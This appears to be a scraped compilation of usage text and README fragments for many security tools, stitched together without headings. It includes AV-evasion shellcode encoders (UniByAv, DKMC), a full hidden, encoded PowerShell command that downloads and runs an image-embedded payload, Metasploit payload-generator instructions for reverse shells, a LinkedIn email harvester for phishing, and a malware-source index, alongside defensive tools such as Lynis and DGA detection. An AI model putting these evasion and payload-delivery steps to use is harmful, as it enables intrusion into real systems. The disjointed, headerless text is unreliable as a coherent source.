$ python UniByAv4.1.py shellcode test.exe /cygdrive/c/Program\ Files\ \(x86\)/CodeBlocks/MinGW/bin/
UniByAv4.1 Shellcode encoder tool / Mr.Un1k0d3r RingZer0 Team 2014
Currently running under (cygwin) LINUX switch is set to 0
Self decoding payload written in assembly

[+]     Generating xoring key
[+]     Xoring key is set to 0x150014cc
[+]     Original shellcode size is (13) bytes adding (3) bytes to align it
[+]     Magic key is set to \x49\x62\x4d\x6b
[+]     Payload + decoder shellcode length is now (134) bytes
[+]     Generating the final c file
[+]     Generating random charset array for kernel32 and SetProcessDEPPolicy
[+]     Generating int array for "kernel32.dll". Array size is: 12
[+]     Generating int array for "SetProcessDEPPolicy". Array size is: 19
[+]     Compiling the final executable
[+]     /cygdrive/c/Users/Mr.Un1k0d3r/Desktop/output/test.exe has been created
[+]     Generation completed

$ python UniByAv4.1.py SHELLCODE malicious.exe none configs/process-evasion.json
UniByAv4.1 Shellcode encoder tool / Mr.Un1k0d3r RingZer0 Team 2014
Currently running under (cygwin) LINUX switch is set to 0
Self decoding payload written in assembly


[+]     *** Loading process evasion module
[+]     Generating xoring key
[+]     Xoring key is set to 0x1e1be916
[+]     Original shellcode size is (5) bytes adding (3) bytes to align it
[+]     Magic key is set to \x52\x42\x4e\x78
[+]     Payload + decoder shellcode length is now (66) bytes
[+]     Generating the final c file
[+]     Generating random charset array for kernel32 and SetProcessDEPPolicy
[+]     Generating int array for "kernel32.dll". Array size is: 12
[+]     Generating int array for "SetProcessDEPPolicy". Array size is: 19
[+]     /cygdrive/c/Users/Mr.Un1k0d3r/Desktop/UniByAv/output/malicious.exe.c has been created
[+]     Generation completed

python
MinGW (shipped with CodeBlocks)

python
wine
MinGW

• Detect Command injection
• Detect SQL injection
• Detect XSS
• Detect directory traversal
• Get a control flow graph
• Get a def-use and/or a use-def chain
• Search GitHub and analyse hits with PyT
• Scan intraprocedural or interprocedural
• A lot of customisation possible

git clone https://github.com/python-security/pyt.git
python setup.py install
pyt -h

python -m pyt -f example/vulnerable_code/XSS_call.py save -du

python -m tests

python -m unittest tests.import_test

python -m unittest tests.import_test.ImportTest.test_import

mkdir ~/a_folder

cd ~/a_folder

git clone https://github.com/python-security/pyt.git

python3 -m venv ~/a_folder/

python --version

Python 3.6.0

pip --version

pip 9.0.1 from /Users/kevinhock/a_folder/lib/python3.6/site-packages (python 3.6)

cd pyt

pip install -r requirements.txt

pip list

gitdb (0.6.4)
GitPython (2.0.8)
graphviz (0.4.10)
pip (9.0.1)
requests (2.10.0)
setuptools (28.8.0)
smmap (0.9.0)

source ~/a_folder/bin/activate

• Twitter
• LinkedIn

• Multiple command execution at the same time.
• Standard NMap output.
• HTML report NMap output.
• Saving output as XML.
• Output minimizing, maximizing and deleting.
• Menu to find most of nmap options.
• Start and stop the webapp at any moment.

Ask
Bing
DuckDuck GO
UOL
Yahoo

git clone https://github.com/mthbernardes/fses.git
cd fses
pip install -r requeriments.txt

from searchEngines.ask import ask

print "Ask Search"
query = "site:domain.com" # Set a dork
a = ask() # Start a instance of any search engine
results = a.search(query,verbose=True) #All classes use the method search, verbose is used just to print, what page the script is scraping
for url in results
 print url

query = "site:domain.com"

from searchEngines.ask import ask
print "Ask Search"
results.extend(ask().search(query,verbose=verbose))

from searchEngines.uol import uol
print "UOL Search"
results.extend(uol().search(query,verbose=verbose))

from searchEngines.bing import bing
print "Bing Search"
results.extend(bing().search(query,verbose=verbose))

from searchEngines.yahoo import yahoo
print "Yahoo Search"
results.extend(yahoo().search(query,verbose=verbose)) 

from searchEngines.duckduckgo import duckDuckGo
print "DuckDuckGo Search"
results.extend(duckDuckGo().search(query,verbose=verbose))

from utils import util
query = "site:conviso.com.br"
results = util.searchAll(query,verbose=False) #searchAll has the same properties then search method
for url in results
 print url

• Is this network opened by pineapple?
• Have you been connected to insecure networks before?
• Logging (Wireless Security Score) (time, mac, ssid, score, is_pineapple)

A Chinese proverb says:
"If attackers are accessing systems using default settings, 
we too can catch them with the default settings in their software and hardware."

• Manufacturer's MAC address information
• Default HTTP Port (1471)
• Default hostname information for wifi-pineapple

• Analyzes the wireless networks you have previously connected

• Windows version
• Full automatic analysis
• New wifi_score and pineapple analysis techniques

• Modules: time, termcolor, sys, commands, interfaces, os
• OS: Kali, Ubuntu
• Python Version: 2.x

git clone https://github.com/besimaltnok/PiFinger.git

pip install -r requirements.txt

cd PiFinger/Linux
python pifinger.py

• Generate shellcode (meterpreter / Beacon)
• Embed the obfuscated shellcode inside the image
• PowerShell download the image and execute the image as shellcode
• Get your shell

$ python dkmc.py


DKMC - Don't kill my cat
         Evasion tool - Mr.Un1k0d3r RingZer0 Team
     |\      _,,,---,,_
    /,`.-'`'    -.  ;-;;,_
   |,4-  ) )-,_..;\ (  `'-'
  '---''(_/--'  `-'\_)    The sleepy cat

----------------------------------------------------
Select an option:

        [*] (gen)       Generate a malicious BMP image
        [*] (web)       Start a web server and deliver malicious image
        [*] (ps)        Generate Powershell payload
        [*] (sc)        Generate shellcode from raw file
        [*] (exit)      Quit the application

>>>

>>> sc
(shellcode)>>> set source shellcode.txt
        [+] source value is set.

(shellcode)>>> run
        [+] Shellcode:
\x41\x41\x41\x41

>>> gen
(generate)>>> set shellcode \x41\x41\x41\x41
        [+] shellcode value is set.

(generate)>>> run
        [+] Image size is 300 x 275
        [+] Generating obfuscation key 0x1f1dad93
        [+] Shellcode size 0x4 (4) bytes
        [+] Generating magic bytes 0xa4d0c752
        [+] Final shellcode length is 0x57 (87) bytes
        [+] New BMP header set to 0x424de9a4c60300
        [+] New height is 0x0e010000 (270)
        [+] Successfully save the image. (/home/ringzer0/tools/DKMC/output/output-1496175261.bmp)

(generate)>>>

>>> ps
(powershell)>>> set url http://127.0.0.1:8080/output-1496175261.bmp
        [+] url value is set.

(powershell)>>> run
        [+] Powershell script:
powershell.exe -nop -w hidden -enc JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEYAVABUAEwAVgBrAEMALwB6AEUAMABPAFQAWQB4AE4AegBVADAATgBEAFEAdQBNAGoAVQAhAHQAVgBaAHIAYgA5AHAASQBGAFAAMABlAEsAZgA5AGgAVgBDAEgAWgBsAG8AdwBMAFMAYgBmAE4AUgBxAHAAVQBuAG4AbQAwAEUASQBKAEoAMABvAFMAaQBhAHIAIQB2AE0ARwBIAHMATQBUAE4AagBFAHIAZgBOAGYAOQA5AHIAWQB6AGQARQBrAEcAeAAyAHQAVwBzACsAWQBIAHYAdQAzAEwAbAB6AHoAcgBuAEgANAA0AEkAdQB1ADEAbwB5AFQAMwBlAEUARAA2AFIAOABDAFYASQB4AEUAWgBLADkAMwBaADMAZABuAFoASwAvAGIASAA4AEYANQBRAHMALwBjAFAAWABGAFAASQBDADcAZQBmACsAbwBkADAANAArAGsAawAvAEcANwBzADQAawBEAGoAMgBkAHgAbAA3ADIANQB2AGYAWAB2AFQAYgA1AHUAYgB0AEQAOABxAHQASABKAFEAMgBJAFcAVgBwAFMAKwBUADAAUQBmAHMAegBCAEoAdABsAEQASgBJAFUASABmAGkAegBCAGUAZwB3AHUATABTADQARwA3AGMAKwBZADEAUgB6AFcAbwBxAGcAcAAhAHMAcgBDADAAZQBGAGgASQA1AFkAUwBRAHIAMQA2AGQAbwA1ACEAMQA1AFMAQwBZAE0AdwBaAEsATgBNAGkAdgA4AGoAVgBEAEMAUwBVAHoAOABhADMANABHAG4AeQBrADUAUwArAE8AMABkAGMAagBDAG4AUAB3ADUASQBHADkAVwBhADQAbwAxAHIAbwBwADIATgBmAGgARQBmAFQAYQBoADAAMwA0AGsAeQBiAHgAcgBkAHYAaABqAFUAcwBWADAAZABPAGEAeABGAFQAcgBrAHoARABUAFoAUwBHAHcAUABFADUATgB5AHoAeQBZAEsAVQBMAEQAcABJAEkAVABLAFAARABQAEMAbQBVAG0ARwBqAG4AaQBvAFgANwBlADgANQBGAHEATwBnAEUAdQBwAGgAdABDAFIAMwBRAE0AKwBFAHIAdwAwAHIAaABLAHYAWQBqAFEAYwBjAHkAegBMAGUAVgA1AGwAbABGAG0AUQBiAGUAOQBuAEQALwBOAGQAKwBYAG8ASABDAFMAYwB4AEkAdQB4AFIAegBNAFUAaABoAHoAYgBwAE4AUAA1AGoAIQB2AG8AaAArAEgAbQBnAFcAIQA0AHgAcQBrAGkARgB5AFEAUwArAGEAQgBjAG8ANQBwADYASABQAG8AdwAyAFIAawBkAHUARwB1ADIAUAB0AHIASgA1AG4AcgBrAHoAQwBxAHAANgBWAGwASQAwAG4AYgA2AHUAeABrAHAASwAyAG0ARwB0AFoAbQBwAFcAdgBNAFcAbgBoAHQAcwBJAHUAIQBQAEsAUwBZAC8AQgBiAEoAZgBMAEgAbwBSAC8AVwBsAFkAdQBGAFIAdQBFAFUAcABqAHkAKwBLAGEANQBpAE4AIQBPADcARgA3ACEAbgBGAHMAaQBRAGYAUwBjAFUAbQBIAFMAeQBLAGEAaQBFAFQAZgBDAHcATgBaACEAegBXAGkAIQB4AFQAcQBvAGEAagBFAFMAbABCAGYAQwA0AG4AOAA2AGIAbwBkADQASwBwAGwAOQBSAG8AYgBMADgAMgBkAGIAWABJAGcAMQBuAEcANAArAG4AMAA3AFAAagBIAFkARABZAE4ARgBxADAAegBIAEIAeABlAEMAdQBhAFAASABsAE0AOQBJAGIAegBVAHYAagBtACsAZwBMAG8ATwB1AEMALwBiAFgAWAA0ADAAVABpAGMAOABMACsAVQBtAFQARgBnAEkAegBTAFMAawAhAGYATQBLAHQAWgByAGIARwBJAFUASgBoAHcAdwArAHAAdwBqAHIAWQB0ADIAbQBrAFEAKwAhADMAdwBRAE8AVQA2AHAAVABpAG0AdwB5ADMASgB6AFcAQwBwAGoAKwBQAGIAYwBlAE0AKwA2AEQAcgBIAG0AbwBDAG8AVgBWAG8AVwBDAHMAcAA4AFcAcwBXAEQAZQBOAGsANwAhAEQAIQBTAEsAOABlAGoAYQBRADMAUQBuADIAQwBCAFQAUgBlAFYAOABrAHgAZQByAHAATQB3AFkAWgBEAFUANgBWAHMAawBrAHYAeABpAGIAMQBiAE8ASQBDADUAZQBEAGIAcABCAFkAcQBsAGcALwBWAFkAaQAyAHkAVwArAE8AeAAzAEUANwBNAE4AZgBPAG8AMABrAFcANgBrAGYAVQBDAHQASABrAEoARABSAEUAcQBMAFcATQBQAGQAWQBCAHcARABOAHcASQBQAEUAWgA1AGkAbwA1AE4AagBwAGsAUAA5AGMAUgBsADAANgBJAFUAWQB5AHMAMgBEAGMAbwA1AEMANgBlAFkAYQBZAG4AYwA0AEoAcwBVAEUAMQBlAG4ANgBwAEoAWQA5AGEAYQBTAEwATQBjAEYAZgBSAEoARQBIACEASwBjAGsATABsAEoAbQA5AE0AcABlAGsAZgBlAGUAcABrADIANgBSAFIAOAA0AHgAVQA3AEsASgBwAHQAMQBWAGsAcABmACEAVgB1AGEALwBXAGoASgBsAHcAdQB0AEUAMAB1AG0AZABUAG8AVQB5AGsAVgBUADcAWAA1ADMAeABWAGEAMgBOAFoARwB2AFEAMABKAE8AYwBsAG0AMABkAGIARABlAHEATABUAGYAaQB2AEYAQwBYAEIAKwBmAG4AWQBSAFgAWQBlADMAbAAxAGUAZABtADMANgBYAHoAZwBhADMAawBVADcAZABmAEYAUABRAFgAVQAhAFQAaABYAEUARABQAFQAegBVAHEAQwBaAHgARgAzAEoAQgAvAFMAYgBWADEASAB3AHoAMAB6AG8ANgBmAFAAdQAyAHUAdgBmAEIAcQBlAEMAdgBlAG4AaABRAE8AYQBpADgARgBiAEcATwBZAGwAMgB1AHYAdgB2AHoAZgBmAFgARABIADMAdgB2AHEAOAA0ADQAaQBOADUAawA3AFYAZgA2ACsAaQBOAGEAcQBMADUAcQBpAGQAbABpAGUAagBvAC8AdgBiADYAZQB6AEQANgBQAGsANQBPAGIAdABQADMAKwB4AGgAUQA3AFYASwBvAFoANQBjAGcANABtAGwAMABoAHYATABhAFEANwBkAHkAdgBlAG8ASwBsAE0AMAB5AHoAKwBMAGoATgBRAFkAYgAhADAAZgA3AHgAIQAxAEcAdwBVAGUATgBjAGUASwBtAEYAUABqAEUAMwB0AFAARwBWAHUAWQA1AFEAZABoAGQANAB1ADcAKwAzADkAYwA0AGkAdgB3AE8AdABSADQAYwB0AFgAaAAwAGUAMwBtAEQAQgB5AE8ANQB6AEMARAB0AGYASQBKAHoAcQBtAFYAMgA1ADMANgA5AFUAMABCAFkAcgA5ACsAOABxAEMATQB2AHIATgA5ADQAUQBVAFcASQArAG0AOQA1AE8AcgBmAFoAWgBoAEYAKwBxAGkAMgBkADEAcgBSAGgAYQAwAHYANQA5ADcAZQBZADYAawBkAEQAcwA5AGkANAA3AHIAVgBiAGMAOQBPAGIALwBPAHoAMgA1AFkARwBmADQANQA3ACsAVwBuAHMAZAAzAEwANAB5ACsAaQByAEsASwAvAFQAeABzAEcANgBGAFAAWAAvAHcAagAvAHYANABOAE0AbABlAFUAYQBRAHgAMgAwAGYAYwA0AHIASAByAHoAWgBZAEIAeQBxAGEANgBkACEATABaAFMAaQBpAHEAYwA1AEYAZAA2AE4ARAB2AEQAagB1ADMAaQBTAFcARgAzAHgALwBpAFUANgB1AEIAawBRAHQAWgBRAFUAdQB3AEgAbgBzAHQAZwBRAFEANgBzADkAWgBPACEAMABsAFQAcQA4AHEAMABZADQAMgBFAHUAUwBqAC8AUQB1AEYAWQByADYAcAArADEANQAwAGUAdAB3AFQASwB1ADkAOAArAEQAZgBxAHQAdQBrAFoAUABXAFYANwBKAHQAaABEAHkAUQBNAHEASgBXAFUALwB0ADcAZQBPAHEAVAAwAHoAZwAxAFAALwBMAGMARwBmAFkAWAB1AFUATQBzAHMAdQBWACsAawBUADUANABnAEsAZQA1ADgAcQBrAFkAWgB3AFkASAArAEwARgBiAEwAeQAxAGIAYwBuAHMAaQBqAFAAOABMAHAAegBWADkAdABFAFEATAAhACEAIQA9ACIALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIAQQAiACkAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA

(powershell)>>>

>>> web 
(web)>>> set port 8080
        [+] port value is set.

(web)>>> run
        [+] Starting web server on port 8080

127.0.0.1 - - [30/May/2017 16:18:43] "GET /output-1496175261.bmp HTTP/1.1" 200 -

• TCP
• UDP
• ICMP
• SOCKS v4, 4a, 5
• HTTP CONNECT
• DNS (A/CNAME, PRIVATE, NULL) - Proof of Concept

# git clone https://github.com/earthquake/xfltreat/

# git clone https://github.com/earthquake/xfltreat/
# cd xfltreat
# git checkout -b next-version v0.2

# git clone https://github.com/earthquake/xfltreat/
# pip install -r requirements.txt
edit xfltreat.conf
# server side: python xfltreat.py
# client side: python xfltreat.py --client

# sysctl -w net.ipv4.ip_forward=1

# echo 1 > /proc/sys/net/ipv4/ip_forward

# iptables -t nat -A POSTROUTING -s 10.9.0.0/24 -o eth0 -j MASQUERADE

• python 2.7
• Linux only
• root privs needed

• server and check functionality can handle all modules enabled in the config.
• client should have only one enabled.

Nmap\s XML result parser and NVD's CPE correlation to search CVE

Example:
python vision2.py -f result_scan.xml -l 3 -o txt

Coded by Mthbernades and CoolerVoid

- https://github.com/mthbernardes
- https://github.com/CoolerVoid

usage: vision2.py [-h] -f NMAPFILE [-l LIMIT] [-o OUTPUT]
vision2.py: error: argument -f/--nmap-file is required

Nmap's XML result parser and NVD's CPE correlation to search CVE

Example:
python vision2.py -f result_scan.xml -l 3 -o txt

Coded by Mthbernades and CoolerVoid

- https://github.com/mthbernardes
- https://github.com/CoolerVoid

usage: vision2.py [-h] -f NMAPFILE [-l LIMIT] [-o OUTPUT]
vision2.py: error: argument -f/--nmap-file is required

1. Prerequisites

1.1 Ruby Environment

• Under rvm use rvm install 2.4.1 --enable-shared when installing ruby.
• Under ruby-install/chruby use -- --enable-shared when installing ruby.
• Under ruby-build/rbenv with ruby-build use CONFIGURE_OPTS=--enable-shared [command] when installing Ruby.

1.2 Install Other Prerequisites:

For OS X:

brew tap cartr/qt4
brew tap-pin cartr/qt4
brew install cartr/qt4/qt@4

brew install cmake usbmuxd libimobiledevice

xcode-select --install

For Ubuntu:

apt-get install cmake libqt4-dev git-core libimobiledevice-utils libplist-utils usbmuxd libxml2-dev libsqlite3-dev -y

2. Installing idb

2.1 Production Use

• Install idb: gem install idb
• Run idb: idb
• Hooray!

2.2 Development

• Clone the repository: git clone https://github.com/dmayer/idb
• cd idb
• bundle install (using the right ruby version)
• As for every ruby gem, the application code lives in the lib folder
• Run idb by calling bundle exec idb
  • Note: Running bin/idb directly won’t work since it will not find the idb gem (or use the installed gem and not the checked out source code). Instead, the bundle exec command runs idb in the current bundler environment where bundler supplies the gem from source.

• Queue - The Queue is a service that runs on a single system, providing an interface for users to submit, pause, resume, and delete jobs. These jobs are then processed and sent to available Resources to perform the actual work and handle the results.
• Resource / Resource Managers - Resources are the individual servers that are connected into the queue. They are managed by a resource manager plugins. These are code that allow various types of resources to be connected. Managers can directly connect to physical resources you own, or use cloud services to spawn resources as necessary.
• Tools - Tools are a set of plugins, configured on resources, that perform the underlying tasks such as running oclHashcat to crack passwords. Tools are written in the Go programming language and have a standard interface to make them easy to write or enhance. They are wrappers of the various tools used that require great deals of resources, such as John, HashCat, etc.

1. First, you'll need to get cracklord itself.
   go get github.com/jmmcatee/cracklord
   
2. Next we need to get all of the dependencies downloaded for both the resource daemon and queue daemon.
   go get github.com/jmmcatee/cracklord/cmd/queued
go get github.com/jmmcatee/cracklord/cmd/resourced
   
3. Now we can actually build the queue daemon and resource daemon
   go build github.com/jmmcatee/cracklord/cmd/queued
go build github.com/jmmcatee/cracklord/cmd/resourced
   
4. Finally, we can run both the resource and queue daemons, which will both be in the cmd/queued and cmd/resourced directories. You will also need to setup the various configuration files, information for those can be found in our wiki.
   

• AIX
• FreeBSD
• HP-UX
• Linux
• Mac OS
• NetBSD
• OpenBSD
• Solaris
• and others

1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan

• Security auditing
• Compliance testing (e.g. PCI, HIPAA, SOx)
• Vulnerability detection and scanning
• System hardening

• Best practices
• CIS
• NIST
• NSA
• OpenSCAP data
• Vendor guides and recommendations (e.g. Debian Gentoo, Red Hat)

Changes:
--------
* Improve systemd detection
* Detect Linux Mint version
* Older versions of Mac OS X are detected as well
* Norwegian translation added
* PAM plugin extended

Tests:
------
* CRYP-7902 - certificate validation changed
* FIRE-4508 - Improved screen output
* PKGS-7380 - NetBSD vulnerability detection adjusted
* TOOL-5002 - Improved detection of Ansible directories and files

• Scheduled Tasks
• Auto-run
• WMI subscriptions
• Security Support provider
• Ease of Access Center backdoors
• Machine account password disable

PS C:\Users\>python norknork.py

PS C:\Users\> .\norknork.exe

PS C:\Users\> .\norknork.exe > results.txt

git clone https://github.com/philarkwright/DGA-Detection.git  
cd DGA-Detection  
chmod +x install.sh
./install.sh

sudo python dga_detection.py

• The /data/dga_training.txt file contains DGA domains from the Tinba DGA. I'd suggest using this to train the model as this follows the structure of the majority of the DGA's domains however you may replace the domains with your own set if you wish too.

• To test domains against the model after training has been complete, create a textfile called test_domains.txt and place it into /data/. -A sample of the Tinba DGA domains has been included in the download.

• The settings file is where the model stores the baseline value used to decide whether or not a domain is a potential DGA. This value can be manually changed to increase detection rate or reduced to decrease false positives.

nohup sudo python dga-detection.py -o 2 -i <interface>

• Malware files in an encrypted ZIP archive.
• SHA256 sum of the 1st file.
• MD5 sum of the 1st file.
• Password file for the archive.

uid,location,type,name,version,author,language,date,architecture,platform,comments,tags

• UID - Determined based on the indexing process.
• Location - The location on the drive of the malware you have searched for.
• Type - Sorts the different types of malware there are. So far we sort by: Virus, Trojans, Botnets, Ransomware, Spyware
• Name - Just the name of the malware.
• Version - Nothing to say here as well.
• Author - ... I'm not that into documentation...
• Programming Language - The state of the malware in regard to source, bin, or which type of source. c/cpp/bin...
• Date - See 'Author' section.
• Architecture - The arch the platform was build for. Can be x86, x64, arm7....
• Platform - Win32, Win64, *nix32, *nix64, iOS, android and so on.
• Comments - Any comments there may be about the item.
• Tags - Tags matching the item.

104,Source/Original/Dexter,trojan,Dexter,2,unknown,c,00/05/2013,x86,win32,NULL,Source

• Moved DB to SQLite3.
• Searching overhaul to a freestyle fashion.
• Fixed "get" command.
• More & more malwares.

• Better and easier UI.
• Aligned printing of malwares.
• Command line arguments are now working.
• Added 10 more malwares (cool ones) to the DB.

• Fix EULA for proper disclaimer.
• More precise searching and indexing including platform and more.
• Added 10 new malwares.
• Git update of platform and new malware.
• Fix display of search.
• Enable support for platform and architecture in indexing.
• Separate between database and application.
• UI improvements.

• Verify argv to be working properly. (fixes in v0.5)
• Virus-Total upload and indexing module. - Not possible due to restrictions of VT.
• Automatic reporting system for malwares which are not indexed in the framework.

• Malware analysis pack has been removed to reduce clone size.
• More documentation has been added.
• Removed debugging function which were dead in the code.

• Fix auto-complete for malware frameworks. (thanks to 5fingers)
• Consider changing DB to XML or SQLite3. (Sheksa - done :))
• Move malwares to another repo.
• Better UI features.

python3 limeaide.py <IP>

limeaide.py [OPTIONS] REMOTE_IP
-h, --help
    Shows the help dialog

-u, --user : <user>
    Execute memory grab as sudo user. This is useful when root privileges are not granted.

-p, --profile : <distro> <kernel version> <arch>
    Skip the profiler by providing the distribution, kernel version, and architecture of the remote client.

-N, --no-profiler
    Do NOT run profiler and force the creation of a new module/profile for the client.

-C, --dont-compress
    Do not compress memory file. By default memory is compressed on host. If you experience issues, toggle this flag. In my tests I see a ~60% reduction in file size

--delay-pickup
    Execute a job to create a RAM dump on target system that you will retrieve later.  The stored job
    is located in the scheduled_jobs/ dir that ends in .dat

-P, --pickup <path to job file .dat>
    Pick up a job you previously ran with the --delayed-pickup switch.
    The file that follows this switch is located in the scheduled_jobs/ directory
    and ends in .dat

-o, --output : <name>
    Change name of output file. Default is dump.bin

-c, --case : <case num>
    Append case number to front of output directory.

--force-clean
    If previous attempt failed then clean up client

• DEB base

sudo apt-get install python3-paramiko python3-termcolor

• RPM base

sudo yum install python3-paramiko python3-termcolor

• pip3

sudo pip3 install paramiko termcolor

LiMEaide/tools/LiME/

1. Download LiME v1.7.8.1
2. Extract into LiMEaide/tools/
3. Rename folder to LiME

• DEB package manager

sudo apt-get install dwarfdump

• RPM package manager

sudo yum install libdwarf-tools

• The idea for this application was built upon the concept dreamed up by and the Linux Memory Grabber project
• And of course none of this could be possible without the amazing LiME project

• Support on for bash. Use other shells at your own risk
• Modules must be built on remote client. Therefore remote client must have proper headers installed.

There are four different scan types which are specified with -s<arg>.

-sB: This does a standard banner grab. The scanner will not send any data as
     it will simply wait and receive data and display it up until the first
     newline or carriage return received.

-sH: This mode sends a "GET / HTTP/1.1" request to every successfully setup
     connection. It's very useful for quickly identifying HTTP servers.

-sT: TLS scanning mode sends a TLS1.0 NULL probe with zero options and zero
     algorithms specified. However if there's a valid TLS server on the
     receiving end it will parse out and try to figure out if it's a valid
     TLS Error response which will then be dispalyed.

-sC: Custom scanning wich will load a payload from a file (specified with -d)
     and send this payload out to every successfully established socket. Can
     be useful for quickly probing very specific protocols

-p:  The list of TCP ports to scan which can be a range of ports or
     single ports with ranges and single ports seperated by comma's. Some
     examples: -p22,80,8080-9000,143 will scan port 22,80,143 and the range of
     8080 to 9000.

-b <limit>: The bandwidth limit to apply for the outgoing probes. This does not
     apply to the data sent and received over the sockets so only to the actual
     SYN probes being sent out. Examples: -b300k, -b67m, -b500b would yield
     bandwidth limits of 300kbps, 76mbps and 500bps respectively.

-d <filename>:  Filename of the file containing the payload used to the custom
     scan. The entire file will be sent up until a maximum of 128kB which
     should be more than enough for most purposes.

-t<timeout>: This specifies the amount of seconds that the scanner will wait
     after it has sent out all the probes with receiving data back over the
     still connected sockets. That is assuming there are any otherwise it will
     bail out the moment there's no more work left to do.

-x:  This forces the tool to alwyas dump output received in hexadecimal
     notation. Otherwise it will only dump data in hexadecimal notation if
     non-printable characters are found.

-v:  This specifies some verbose output. It's mostly only useful for debugging.

-i <iface>: The interface to use for selecting the source IP and setting up
     the pcap backend. This should not be necessary on standard machines with
     just one properly configured NIC but with multiple NICs one might need it.

-r <seed>: The random seed to use for the RNG being used. Mostly useful for
     debugging and making sure that one can get the tool to generate the exact
     same sequence of packets again. The argument is an integer and can be 
     specified in hexadecimal and decimal notation.

-T <ttl>: Override the default IP TTL value to use in SYN probes. Not really
     necessary for anything but included for the sake of completeness.

-W <win>: Override the default TCP Window size value to use in SYN probes. Not
     really necessary for anything but included for the sake of completeness.

-I <id>: Override the default IP ID value to use in SYN probes. Not really
     necessary for anything but included for the sake of completeness.

-n:  This option should only be used if you know what you're doing. It will
     make sure the tool does NOT set the firewall rule to drop all outgoing
     RST packets. If this is used then the scanner will not fork and one has
     the responsibility to set this rule by hand as otherwise the kernel will
     send RST packets back for every SYNACK packet received. This will make
     the tool simply not work. The rule as it's being set on Linux is the
     following:

     $ /sbin/iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP

-o:  This option does not do the I/O redirection so one will see more output
     of the uinet internals. It's only added for the sake of completeness or
     for debugging scenario's as it's not very useful otherwise.

-h:  The usage information.

./pbscan -sB -p22 x.x.x.x/24

./pbscan -sH -x -p80,8080-9000 x.x.x.x

sent: 1.97% (of 254), open: 0, active: 2, acks: 2

• Run setup.sh as root
• Adjust Linkedin credentials in raven.py or pass them as parameters.
• If you are running in Kali Linux , to avoid problems with selenium update firefox to the latest version.

  -c COMPANY, --company COMPANY       Input the Company name. Ex: Pizzahut

  -s STATE, --state STATE             Input the State initials. Ex: uk , al , etc...

  -d DOMAIN, --domain DOMAIN          Input the domain name. Ex: gmail.com

  -p PAGES, --pages PAGES             Number of google pages to navigate. Ex: 3

  -lu LUSERNAME --lusername LUSERNAME    The linkedin username to use.

  -lp LPASSWORD, --lpassword LPASSWORD   The linekdin password to use.

python raven.py -c 'Evil Corp' -s al -d evilcorp.al

python raven.py -c 'Evil Corp' -s al -d evilcorp.al -p 3

  For example : al.linkedin.com is for Albania, uk.linkedin.com is for United Kingdom etc. 

• Automatically check found emails in haveibeenpwned.com
• Output in CSV format (For using with GoPhish)

• Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
• Don't know what your external IP is? MSFPC will discover it: wan.
• Want to generate one of each payload? No issue! Try: loop.
• Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

• Designed for Kali Linux v2.x/Rolling& Metasploit v4.11+.
• Kali v1.x should work.
• OSX 10.11+ should work.
• Weakerth4n 6+ should work.
• ...nothing else has been tested.

$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpc

root@kali:~# apt install -y msfpc

$ bash msfpc.sh -h -v
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
   Example: msfpc.sh windows 192.168.1.10        # Windows & manual IP.
            msfpc.sh elf bind eth0 4444          # Linux, eth0's IP & manual port.
            msfpc.sh stageless cmd py https      # Python, stageless command prompt.
            msfpc.sh verbose loop eth1           # A payload for every type, using eth1's IP.
            msfpc.sh msf batch wan               # All possible Meterpreter payloads, using WAN IP.
            msfpc.sh help verbose                # Help screen, with even more information.

<TYPE>:
   + APK
   + ASP
   + ASPX
   + Bash [.sh]
   + Java [.jsp]
   + Linux [.elf]
   + OSX [.macho]
   + Perl [.pl]
   + PHP
   + Powershell [.ps1]
   + Python [.py]
   + Tomcat [.war]
   + Windows [.exe // .dll]

 Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
 Missing <DOMAIN/IP> will default to the IP menu.

 Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
 Missing <CMD/MSF> will default to <MSF> where possible.
   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
<MSF> payloads are generally much larger than <CMD>, as it comes with more features.

<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
